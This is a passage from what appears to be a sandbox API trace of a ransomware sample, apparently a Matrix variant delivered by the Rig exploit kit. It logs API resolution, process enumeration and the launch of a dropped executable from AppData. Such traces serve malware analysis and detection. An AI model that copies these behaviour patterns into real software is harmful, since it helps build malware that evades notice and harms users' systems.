lpWideCharStr="Process32NextW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0093.097] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32NextW", cchWideChar=14, lpMultiByteStr=0x13e2d2c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32NextW", lpUsedDefaultChar=0x0) returned 14 [0093.097] GetProcAddress (hModule=0x76910000, lpProcName="Process32NextW") returned 0x7694faca [0093.097] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Thread32First", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.097] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Thread32First", cchWideChar=13, lpMultiByteStr=0x13e2d2c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Thread32First", lpUsedDefaultChar=0x0) returned 13 [0093.097] GetProcAddress (hModule=0x76910000, lpProcName="Thread32First") returned 0x76977e4c [0093.097] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Thread32Next", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.097] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Thread32Next", cchWideChar=12, lpMultiByteStr=0x13e2d2c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Thread32Next", lpUsedDefaultChar=0x0) returned 12 [0093.097] GetProcAddress (hModule=0x76910000, lpProcName="Thread32Next") returned 0x76977edc [0093.097] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32First", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 
lpUsedDefaultChar=0x0) returned 13 [0093.097] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32First", cchWideChar=13, lpMultiByteStr=0x13e2d2c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32First", lpUsedDefaultChar=0x0) returned 13 [0093.097] GetProcAddress (hModule=0x76910000, lpProcName="Module32First") returned 0x769a0859 [0093.098] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32Next", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.098] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32Next", cchWideChar=12, lpMultiByteStr=0x13e2d2c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32Next", lpUsedDefaultChar=0x0) returned 12 [0093.098] GetProcAddress (hModule=0x76910000, lpProcName="Module32Next") returned 0x769a0942 [0093.098] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32FirstW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0093.098] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32FirstW", cchWideChar=14, lpMultiByteStr=0x13e2d2c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32FirstW", lpUsedDefaultChar=0x0) returned 14 [0093.098] GetProcAddress (hModule=0x76910000, lpProcName="Module32FirstW") returned 0x7694c59e [0093.098] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32NextW", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.098] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32NextW", cchWideChar=13, 
lpMultiByteStr=0x13e2d2c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32NextW", lpUsedDefaultChar=0x0) returned 13 [0093.098] GetProcAddress (hModule=0x76910000, lpProcName="Module32NextW") returned 0x7694c11f [0093.098] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32FirstW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0093.098] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32FirstW", cchWideChar=14, lpMultiByteStr=0x13e2d2c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32FirstW", lpUsedDefaultChar=0x0) returned 14 [0093.098] GetProcAddress (hModule=0x76910000, lpProcName="Module32FirstW") returned 0x7694c59e [0093.098] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32NextW", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.098] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32NextW", cchWideChar=13, lpMultiByteStr=0x13e2d2c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32NextW", lpUsedDefaultChar=0x0) returned 13 [0093.098] GetProcAddress (hModule=0x76910000, lpProcName="Module32NextW") returned 0x7694c11f [0093.098] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0093.105] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0093.106] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0093.107] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0093.108] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0093.108] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0093.109] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0093.110] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0093.111] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0093.112] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0093.113] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0093.114] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.115] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.115] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.116] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.117] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.118] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0093.119] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.120] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.121] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0093.122] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.123] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0093.125] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0093.127] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0093.128] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0093.130] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.131] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0093.133] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0093.134] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0093.136] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0093.137] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0093.138] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0093.140] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0093.141] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0093.142] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0093.143] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0093.144] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0093.145] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: 
lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0093.146] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0093.147] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0093.148] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0093.149] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0093.150] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0093.151] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0093.152] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0093.153] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0093.154] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0093.155] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.156] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0093.157] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0093.158] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa78, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe")) returned 1 [0093.159] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa88, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0093.160] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xab4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0093.161] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xab4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0093.162] CloseHandle (hObject=0xc4) returned 1 [0093.162] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" 7l6OWDI9Fmrsoy1O", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fc14*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fc04 | out: lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" 7l6OWDI9Fmrsoy1O", lpProcessInformation=0x12fc04*(hProcess=0xc0, hThread=0xc4, dwProcessId=0xacc, dwThreadId=0xad0)) returned 1 [0093.336] CloseHandle (hObject=0xc0) returned 1 [0093.336] CloseHandle (hObject=0xc4) returned 1 [0093.336] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc8 
[0093.341] Process32FirstW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0093.342] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0093.342] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0093.343] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0093.344] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0093.344] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0093.345] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0093.346] 
